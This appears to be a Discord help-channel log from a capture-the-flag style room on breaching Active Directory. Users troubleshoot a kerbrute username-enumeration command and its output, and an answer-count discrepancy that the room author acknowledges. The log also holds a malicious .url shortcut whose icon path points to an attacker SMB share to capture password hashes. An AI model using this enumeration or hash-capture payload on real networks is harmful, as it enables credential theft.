#intro-to-ad-breaching

🥳

for some reason I keep getting different result for valid usernames found, took few tries to get correct answer

It also takes so long to run

from attackbox it work fine, do not take long

I keep getting the same amount of valid usernames in attackbox and my own machine, but registering incorrect

@dusky mortar Please slow down. Further spam will result in a short timeout.

Did you managed to get correct answer?

Could you maybe share output so I can check? Might be that certain accounts are locking out from the attack?

Shared it with you, couldn’t sent it in this Chanel.

kerbrute userenum -d thm.loc --dc 192.168.12.100 /root/usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 05/13/26 - Ronnie Flathers @ropnop

2026/05/13 17:32:01 >  Using KDC(s):
2026/05/13 17:32:01 >      192.168.12.100:88

2026/05/13 17:32:01 >  [+] VALID USERNAME:     claire.ross@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     james.wilson@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     ben.carter@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     phillip.green@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     mary.jenkins@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     emma.clark@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     ryan.patel@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     administrator@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     laura.wood@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     kevin.shah@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     john.harris@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     anna.lee@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     david.grant@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     susan.brooks@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     sarah.jones@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     mike.brown@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     lisa.chen@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     rachel.king@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     tom.wright@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     nina.kumar@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     adam.cole@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     hannah.scott@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     bob.taylor@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     dev.intern@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     kate.miller@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     alex.foster@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     sophie.hall@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     daniel.reed@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     olivia.hunt@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     lucy.powell@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     sam.morgan@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     alice.moore@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     chris.baker@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     grace.edwards@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     mark.robinson@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     peter.davies@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     amy.fisher@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     jake.hughes@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     megan.price@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     luke.barnes@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     zoe.murphy@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     frank.butler@thm.loc
2026/05/13 17:32:01 >  [+] VALID USERNAME:     svc.jenkins@thm.loc
2026/05/13 17:32:01 >  Done! Tested 101 usernames (43 valid) in 0.219 seconds

Answer is 42, but this shows 43.

I also confused. Please remember Task3. Usernames in a specific format are required. I used 'grep -E' command.

By the way, I can't receive password hash(@ Task6). My payload is here. Something wrong?:
strings @Shortcut.url

[InternetShortcut]
URL=http://thm.loc
WorkingDirectory=thm
IconFile=\192.168.21.4\icons\icon.ico
IconIndex=1

Correct

Same here

I think this is a me problem. I think just before release I made some changes for stability that pushed the count up by one. The easier answer is going to be to update the answer of the question. Will push that through

other users already in the share with the same filename pointing to their ip likely cause (can rule it out by logging in and viewing directory) - try renaming the file and re-upload

thx

I tried to upload same filename once and I downloaded it. I found I could overwrite. The opposite is also true.

Let's see how big of an issue it is. The reason I say this is the script I have is SUPER aggressive. You should get your callback in a matter of seconds. hence why I didn't think to include something like _username so each user basically does cleanup for the next user 😅 But if it becomes too big of an issue, can add a unique tag to each upload.

ye- when it happened to me (no connect back) and i saw all those dups of shortcut.url, i had a flashback to that game of tackle called Red Team Capstone Challenge Beta Release - 😅 - that arena helped me troubleshoot this instantly, so looking back- grateful for the experience;)

This helped me, thx

Gave +1 Rep to @wraith tartan (current: #20 - 543)

@wraith harbor could you move to room to the "Recent Release Help" section on Discord? Thx in advance!

Gave +1 Rep to @wraith harbor (current: #14 - 663)

Hi, Networks go into this section, even when it is a new release.

Ahh yess I forgot